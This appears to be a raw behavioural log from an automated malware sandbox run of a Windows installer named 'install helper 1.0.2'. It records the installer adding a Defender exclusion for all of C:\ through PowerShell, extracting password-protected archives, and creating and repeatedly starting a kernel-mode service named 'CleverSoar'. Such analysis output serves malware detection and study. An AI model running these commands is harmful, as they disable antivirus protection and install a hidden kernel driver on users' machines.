Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeVirustotal: Detection: 6%
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$1043E,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$100214,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$1043E,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$100214,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
